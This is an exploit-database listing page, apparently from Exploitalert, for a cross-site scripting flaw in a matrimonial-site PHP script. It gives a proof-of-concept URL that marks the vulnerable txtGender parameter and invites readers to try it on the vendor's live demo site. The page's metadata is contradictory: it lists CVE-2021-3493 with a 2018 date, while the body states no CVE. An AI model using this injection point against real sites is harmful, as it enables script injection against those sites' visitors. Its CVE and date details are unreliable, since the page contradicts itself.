Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-3493 | CWE-79 | $500 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-04-20 |
# Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Demo Details: http://www.mscript.in/matrimonial-demo.html # Live Demo : http://www.live.mscript.in/ # Version: N/A # Category: Webapps # Tested on: Windows_7_64x # CVE: N/A ================== # Exploit Author: Mgm-Eg # Author Social: ask.fm/m1g1m ==================== # Description: # The vulnerability allows an attacker to inject and execute Javascript code poc : | (XSS) | ----------- http://localhost/occusearch_results.php? |txtGender=(XSS)&txtSAge=18&txtEAge=80&txtOccu=Any&Submit.x=27&Submit.y=1 ---- You can try it on (Matrimonial Sites DEMO)
Copyright ©2024 Exploitalert.